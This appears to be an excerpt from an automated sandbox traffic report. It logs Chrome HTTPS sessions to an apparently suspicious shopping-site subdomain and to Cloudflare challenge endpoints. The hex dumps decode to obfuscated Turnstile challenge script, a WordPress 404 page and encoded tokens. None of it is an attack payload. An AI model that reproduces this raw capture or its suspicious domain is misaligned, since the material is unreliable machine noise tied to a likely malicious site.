                                                                                  2025-01-15 01:58:32 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32
                                                                                  Data Ascii: "Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","testing_only":"Testing%20only.","turnstile_feedback_description":"Send%2
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 2c 67 65 2c 67 66 2c 67 67 2c 67 71 2c 67 42 2c 67 46 2c 67 47 2c 67 48 2c 65 52 2c 65 53 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 39 31 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 38 35 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 35 34 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 35 36 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 38 32 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 32 39 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 34 31 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49
                                                                                  Data Ascii: ,ge,gf,gg,gq,gB,gF,gG,gH,eR,eS){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(191))/1*(-parseInt(gI(985))/2)+-parseInt(gI(754))/3*(-parseInt(gI(256))/4)+parseInt(gI(282))/5*(-parseInt(gI(629))/6)+parseInt(gI(1541))/7+-parseInt(gI
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 78 28 31 32 35 30 29 5d 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 68 78 28 32 38 39 29 5d 28 48 2c 31 29 5d 3f 47 5b 68 78 28 39 31 36 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 76 28 34 35 38 29 5d 5b 68 76 28 31 34 35 31 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 68 76 28 32 36 32 29 5d 28 43 2c 78 5b 68 76 28 31 32 35 30 29 5d 29 3b 43 2b 2b 29 69 66 28 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 76 28 31 30 30 37 29 5d 28 66 6e 2c 67 2c 68 2c 44 29 2c 6f 5b 68 76 28 33 36 38 29 5d 28 42 2c 45 29 29 7b 69 66 28 6f 5b 68 76 28 32 30 35 29 5d 28 68 76 28 36 36 38 29 2c 68 76 28 31 37 31 29 29 29 72 65 74 75 72 6e 3b 65 6c 73 65 20 46 3d 27 73 27 3d
                                                                                  Data Ascii: x(1250)];G[H]===G[o[hx(289)](H,1)]?G[hx(916)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[hv(458)][hv(1451)](B),C=0;o[hv(262)](C,x[hv(1250)]);C++)if(D=x[C],E=o[hv(1007)](fn,g,h,D),o[hv(368)](B,E)){if(o[hv(205)](hv(668),hv(171)))return;else F='s'=
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 4d 5b 69 36 28 32 34 34 29 5d 5b 69 36 28 31 31 34 34 29 5d 28 29 2c 65 4d 5b 69 36 28 32 34 34 29 5d 5b 69 36 28 34 31 32 29 5d 28 29 2c 65 4d 5b 69 36 28 31 31 37 37 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 69 36 28 39 37 36 29 5d 5b 69 36 28 32 33 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 69 36 28 31 30 33 39 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 69 36 28 31 30 38 33 29 5d 5b 69 36 28 31 31 38 32 29 5d 2c 27 65 76 65 6e 74 27 3a 69 36 28 31 31 34 38 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 69 36 28 31 30 38 33 29 5d 5b 69 36 28 32 37 32 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 69 36 28 31 30 38 33 29 5d 5b 69 36 28 33 33 34 29 5d 2c 27 63 6f 64 65 27 3a 69 36 28 37 35 39 29 2c 27 72 63 56 27 3a 65 4d 5b 69 36 28 31 30 38
                                                                                  Data Ascii: M[i6(244)][i6(1144)](),eM[i6(244)][i6(412)](),eM[i6(1177)]=!![],eM[i6(976)][i6(238)]({'source':e[i6(1039)],'widgetId':eM[i6(1083)][i6(1182)],'event':i6(1148),'cfChlOut':eM[i6(1083)][i6(272)],'cfChlOutS':eM[i6(1083)][i6(334)],'code':i6(759),'rcV':eM[i6(108
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 69 37 28 31 30 38 33 29 5d 5b 69 37 28 34 32 39 29 5d 2b 27 3d 27 2b 46 29 7d 65 6c 73 65 20 6a 5b 69 37 28 39 37 36 29 5d 5b 69 37 28 32 33 38 29 5d 26 26 28 48 3d 7b 7d 2c 48 5b 69 37 28 34 33 37 29 5d 3d 69 37 28 34 35 33 29 2c 48 5b 69 37 28 34 32 34 29 5d 3d 78 5b 69 37 28 31 30 38 33 29 5d 5b 69 37 28 31 31 38 32 29 5d 2c 48 5b 69 37 28 31 32 31 39 29 5d 3d 42 5b 69 37 28 31 30 38 33 29 5d 5b 69 37 28 33 39 32 29 5d 2c 48 5b 69 37 28 38 32 39 29 5d 3d 69 37 28 31 31 34 38 29 2c 48 5b 69 37 28 38 33 37 29 5d 3d 43 5b 69 37 28 31 30 38 33 29 5d 5b 69 37 28 32 37 32 29 5d 2c 48 5b 69 37 28 39 34 30 29 5d 3d 44 5b 69 37 28 31 30 38 33 29 5d 5b 69 37 28 33 33 34 29 5d 2c 48 5b 69 37 28 31 31 30 34 29 5d 3d 45 2c 6e 5b 69 37 28 39 37 36 29 5d 5b 69 37 28
                                                                                  Data Ascii: i7(1083)][i7(429)]+'='+F)}else j[i7(976)][i7(238)]&&(H={},H[i7(437)]=i7(453),H[i7(424)]=x[i7(1083)][i7(1182)],H[i7(1219)]=B[i7(1083)][i7(392)],H[i7(829)]=i7(1148),H[i7(837)]=C[i7(1083)][i7(272)],H[i7(940)]=D[i7(1083)][i7(334)],H[i7(1104)]=E,n[i7(976)][i7(
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 2c 65 4d 5b 69 63 28 31 37 30 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 6b 5b 69 63 28 31 30 39 36 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 69 61 28 33 35 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 64 2c 73 2c 76 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 69 64 3d 69 61 2c 73 3d 7b 7d 2c 73 5b 69 64 28 37 38 34 29 5d 3d 69 64 28 31 35 33 31 29 2c 73 5b 69 64 28 33 39 31 29 5d 3d 69 64 28 37 37 37 29 2c 73 5b 69 64 28 36 34 30 29 5d 3d 69 64 28 31 31 36 35 29 2c 76 3d 73 2c 69 64 28 31 30 33 37 29 21 3d 3d 6b 5b 69 64 28 35 32 38 29 5d 29 7b 66 6f 72 28 42 3d 69 64 28 31 30 30 38 29 5b 69 64 28 31 30 37 38 29 5d 28 27 7c 27 29 2c 43 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 42 5b 43 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 45 5b 69 64 28 37 39 36 29
                                                                                  Data Ascii: ,eM[ic(170)](o,undefined,k[ic(1096)])},10),eM[ia(359)](function(id,s,v,B,C,D,E,F){if(id=ia,s={},s[id(784)]=id(1531),s[id(391)]=id(777),s[id(640)]=id(1165),v=s,id(1037)!==k[id(528)]){for(B=id(1008)[id(1078)]('|'),C=0;!![];){switch(B[C++]){case'0':E[id(796)
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 65 34 2c 65 3d 67 43 28 29 2c 21 65 4d 5b 6a 76 28 31 31 37 37 29 5d 26 26 21 67 68 28 29 26 26 21 65 4d 5b 6a 76 28 32 34 34 29 5d 5b 6a 76 28 31 33 30 33 29 5d 26 26 63 5b 6a 76 28 36 39 37 29 5d 28 65 2d 67 42 2c 64 29 3f 66 58 28 29 3a 63 5b 6a 76 28 31 35 34 34 29 5d 28 66 59 29 7d 2c 31 65 33 29 29 2c 67 46 3d 7b 7d 2c 67 46 5b 67 4a 28 31 33 30 33 29 5d 3d 21 5b 5d 2c 67 46 5b 67 4a 28 34 34 31 29 5d 3d 66 48 2c 67 46 5b 67 4a 28 33 34 35 29 5d 3d 67 74 2c 67 46 5b 67 4a 28 31 31 33 36 29 5d 3d 67 79 2c 67 46 5b 67 4a 28 36 34 39 29 5d 3d 67 7a 2c 67 46 5b 67 4a 28 34 31 32 29 5d 3d 67 75 2c 67 46 5b 67 4a 28 31 30 36 32 29 5d 3d 67 41 2c 67 46 5b 67 4a 28 37 39 31 29 5d 3d 67 78 2c 67 46 5b 67 4a 28 31 34 37 31 29 5d 3d 67 77 2c 67 46 5b 67 4a 28
                                                                                  Data Ascii: e4,e=gC(),!eM[jv(1177)]&&!gh()&&!eM[jv(244)][jv(1303)]&&c[jv(697)](e-gB,d)?fX():c[jv(1544)](fY)},1e3)),gF={},gF[gJ(1303)]=![],gF[gJ(441)]=fH,gF[gJ(345)]=gt,gF[gJ(1136)]=gy,gF[gJ(649)]=gz,gF[gJ(412)]=gu,gF[gJ(1062)]=gA,gF[gJ(791)]=gx,gF[gJ(1471)]=gw,gF[gJ(
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 44 69 7a 61 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 69 54 6b 69 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 69 4b 47 6a 4f 27 3a 6a 7a 28 38 38 32 29 2c 27 50 56 54 78 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 78 61 6d 51 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 5a 6e 62 69 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4e 55 67 46 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 61 6a 52 55 48
                                                                                  Data Ascii: ion(h,i){return h<<i},'Dizav':function(h,i){return h(i)},'iTkiT':function(h,i){return h===i},'iKGjO':jz(882),'PVTxq':function(h,i){return h<<i},'xamQI':function(h,i){return h==i},'ZnbiC':function(h,i){return h<<i},'NUgFj':function(h,i){return i==h},'ajRUH
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 28 34 38 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 43 28 32 35 37 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 6a 43 28 32 35 38 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 6a 43 28 31 35 30 36 29 5d 28 48 2c 31 29 7c 64 5b 6a 43 28 31 30 39 37 29 5d 28 4d 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 6a 43 28 34 38 34 29 5d 28 64 5b 6a 43 28 31 34 33 34 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 6a 43 28 31 34 36 34 29 21 3d 3d 6a 43 28 33 32 34 29 29 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 6a 43 28 31 31 39 36 29 5d 28 64 5b 6a 43 28 31 35 30 36 29 5d 28 48 2c 31 29 2c 4d 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c
                                                                                  Data Ascii: (484)](o(H)),H=0):I++,s++);for(M=C[jC(257)](0),s=0;d[jC(258)](8,s);H=d[jC(1506)](H,1)|d[jC(1097)](M,1),j-1==I?(I=0,G[jC(484)](d[jC(1434)](o,H)),H=0):I++,M>>=1,s++);}else if(jC(1464)!==jC(324)){for(M=1,s=0;s<F;H=d[jC(1196)](d[jC(1506)](H,1),M),I==j-1?(I=0,


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.449767108.179.252.844438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:32 UTC624OUTGET /favicon.ico HTTP/1.1
                                                                                  Host: aifunygg.planaltinashopping.com.br
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://aifunygg.planaltinashopping.com.br/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:32 UTC263INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 01:58:32 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Last-Modified: Tue, 04 Oct 2022 14:02:43 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 11816
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Type: text/html
                                                                                  2025-01-15 01:58:32 UTC7929INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Typ
                                                                                  2025-01-15 01:58:32 UTC3887INData Raw: 69 74 65 43 6f 6e 64 20 25 7b 52 45 51 55 45 53 54 5f 46 49 4c 45 4e 41 4d 45 7d 20 21 2d 64 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 52 65 77 72 69 74 65 52 75 6c 65 20 2e 20 2f 69 6e 64 65 78 2e 70 68 70 20 5b 4c 5d 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 26 6c 74 3b 2f 49 66 4d 6f 64 75 6c 65 26 67 74 3b 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 23 20 45 6e 64 20 57 6f 72 64 50 72 65 73 73 0a 09 09 09 09 09 09 09 09 09 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 72 20 62 6c 6f 67 20 69 73 20 73 68 6f 77 69 6e 67 20 74 68 65 20 77 72 6f 6e 67 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 6e 20 6c 69 6e 6b 73 2c 20 72 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 61 6e 6f 74 68 65
                                                                                  Data Ascii: iteCond %{REQUEST_FILENAME} !-d<br>RewriteRule . /index.php [L]<br>&lt;/IfModule&gt;<br># End WordPress</p></div><p>If your blog is showing the wrong domain name in links, redirecting to anothe


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.449768104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:32 UTC1169OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/58773639:1736903612:qJGc1e2dAaYtSb8S_Pl2oWagprYsbTE0u73qNtbBmWI/902242d8f9180f6d/aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 3208
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  CF-Chl-RetryAttempt: 0
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:32 UTC3208OUTData Raw: 76 5f 39 30 32 32 34 32 64 38 66 39 31 38 30 66 36 64 3d 51 47 33 71 45 71 34 71 7a 71 38 71 37 4a 53 46 4a 53 4e 71 4a 50 41 65 24 49 50 53 6f 4a 68 68 53 44 4b 53 41 42 71 4a 56 53 57 71 41 33 49 41 79 56 33 53 62 55 56 53 30 43 4a 32 51 53 6c 71 4a 4e 33 53 41 52 48 47 74 6b 53 52 65 53 4d 53 4a 47 53 52 33 59 42 53 4b 53 74 42 41 68 53 65 42 55 69 32 71 71 24 42 53 67 42 48 59 25 32 62 32 53 76 6d 6d 7a 6e 53 47 4d 42 74 61 53 66 68 48 74 55 69 2b 4c 67 61 53 54 30 72 6a 72 72 37 72 45 4f 68 33 53 4a 61 53 55 38 79 53 33 76 61 4b 57 38 6e 53 6b 66 71 53 69 43 53 49 4b 38 33 63 79 62 4f 24 43 6d 4f 62 57 4f 4a 35 78 58 69 5a 71 41 52 2d 30 43 71 6c 41 42 42 6e 58 57 53 69 71 74 32 48 53 4a 4b 44 45 55 56 6e 71 49 53 6a 77 66 42 68 30 4b 47 68 33 54 74
                                                                                  Data Ascii: v_902242d8f9180f6d=QG3qEq4qzq8q7JSFJSNqJPAe$IPSoJhhSDKSABqJVSWqA3IAyV3SbUVS0CJ2QSlqJN3SARHGtkSReSMSJGSR3YBSKStBAhSeBUi2qq$BSgBHY%2b2SvmmznSGMBtaSfhHtUi+LgaST0rjrr7rEOh3SJaSU8yS3vaKW8nSkfqSiCSIK83cybO$CmObWOJ5xXiZqAR-0CqlABBnXWSiqt2HSJKDEUVnqISjwfBh0KGh3Tt
                                                                                  2025-01-15 01:58:32 UTC751INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:32 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 152960
                                                                                  Connection: close
                                                                                  cf-chl-gen: 145nIKU14EQO3Hvxxp99l+TaBLWpnOgvDVJU6ziJE1V6+IMYZgXIYCVPnHCxvorpT+/QfwFQJ4AIGFC+pHJiiEDrPv53FOIeZ+8qGztgtOOVSXkJIY+c86aDHxw8fCyMUqqbsFLsuRVCkNfFA9fwq749w2aaPXzl/1Ix0CwWHVFP7gt/B1BZKn+XcGdSw0nWMX7lKmeK0B4PlH4TAVJKNHcFnPLsJJEjpd1wo6Pn9G8Y6trMjpLkIvJVvux3zBfkxzW4y/9i2hl0caXAABU+8qFJfdfuPnzdOnXhNrC5dMX6QWBoVxU3S1FUJUOhZksLeKPlfB6p5rGD47tcnXKpgBUapbM52jFyPugcA0glKQubdP4Fg07XneaFlL+HAs9pYigKMX08RlbWeQTECYHa/t7oLi49sg3QsHdCa/QDMhU+igo7q4ZDSqsJLz1kPOO2NovEoNdpa1/c76wujU3bHuxlHQHA4eLcXhu6kVW32oI=$A28O3Rk72ZgZ2zrC6ejtJQ==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242e34f02432b-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:32 UTC618INData Raw: 6d 70 61 34 78 5a 2b 49 68 71 37 45 78 71 36 51 6b 4e 44 56 31 4b 58 57 74 61 53 6c 70 4c 48 48 6b 64 43 78 30 39 43 77 32 35 2b 2f 73 37 48 48 77 4d 72 73 36 73 50 51 33 4f 66 54 77 73 7a 65 34 38 48 56 32 2f 72 37 32 4c 6d 39 37 63 33 5a 2f 4f 7a 51 76 41 51 44 35 77 55 4b 42 4f 66 48 79 38 4c 44 30 65 49 55 7a 4e 37 6c 46 2b 45 45 36 41 7a 63 38 4e 45 41 48 53 50 7a 33 64 34 41 47 2f 62 69 42 43 41 6b 36 53 6f 6c 45 51 51 42 46 51 6a 6e 37 76 51 6b 4f 6a 55 33 2b 51 6a 33 4d 53 6b 57 47 67 30 61 4f 7a 77 46 2b 6b 4d 46 43 66 34 2f 50 6b 74 4c 4a 77 6f 2f 4e 43 6b 32 55 46 64 4b 54 55 39 4e 48 55 64 63 48 52 35 42 48 55 38 6c 56 47 41 37 51 46 6c 6c 56 53 74 67 4b 53 35 65 5a 33 46 4b 61 6b 56 4b 61 47 35 71 61 45 70 7a 65 57 74 51 57 32 46 5a 51 34 56
                                                                                  Data Ascii: mpa4xZ+Ihq7Exq6QkNDV1KXWtaSlpLHHkdCx09Cw25+/s7HHwMrs6sPQ3OfTwsze48HV2/r72Lm97c3Z/OzQvAQD5wUKBOfHy8LD0eIUzN7lF+EE6Azc8NEAHSPz3d4AG/biBCAk6SolEQQBFQjn7vQkOjU3+Qj3MSkWGg0aOzwF+kMFCf4/PktLJwo/NCk2UFdKTU9NHUdcHR5BHU8lVGA7QFllVStgKS5eZ3FKakVKaG5qaEpzeWtQW2FZQ4V
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 32 49 65 48 42 71 58 57 79 4e 65 4a 75 43 63 35 47 4f 64 57 2b 57 6d 32 61 62 68 5a 75 6a 68 5a 32 6b 67 35 43 7a 70 49 53 67 6a 33 6d 61 6c 34 75 36 64 62 61 54 77 61 4b 61 6b 72 61 32 6e 36 4b 2f 76 4c 69 43 6d 61 76 50 70 5a 32 61 77 61 2b 50 30 73 48 47 77 6f 7a 4f 73 4d 61 73 6c 72 36 31 32 4c 76 51 77 4c 62 42 78 72 2f 63 77 38 72 65 34 74 37 68 75 66 4f 6c 33 61 7a 6e 30 75 72 70 78 76 4c 49 33 75 6d 37 38 76 4b 39 77 66 33 2b 32 73 44 45 38 66 30 45 35 73 33 46 2f 74 33 49 35 2b 41 50 43 64 38 57 36 2b 67 46 38 74 4c 61 44 50 4c 66 43 69 4c 78 45 53 41 62 46 76 66 6e 4a 4f 59 45 2f 67 34 62 41 4f 2f 36 44 6a 59 72 4e 69 77 32 4b 43 34 7a 4f 6a 77 5a 50 43 34 38 47 67 38 59 4c 67 50 2b 50 68 4d 2b 4c 55 6c 50 4b 67 49 5a 53 53 68 56 52 53 38 4a 4a
                                                                                  Data Ascii: 2IeHBqXWyNeJuCc5GOdW+Wm2abhZujhZ2kg5CzpISgj3mal4u6dbaTwaKakra2n6K/vLiCmavPpZ2awa+P0sHGwozOsMaslr612LvQwLbBxr/cw8re4t7hufOl3azn0urpxvLI3um78vK9wf3+2sDE8f0E5s3F/t3I5+APCd8W6+gF8tLaDPLfCiLxESAbFvfnJOYE/g4bAO/6DjYrNiw2KC4zOjwZPC48Gg8YLgP+PhM+LUlPKgIZSShVRS8JJ
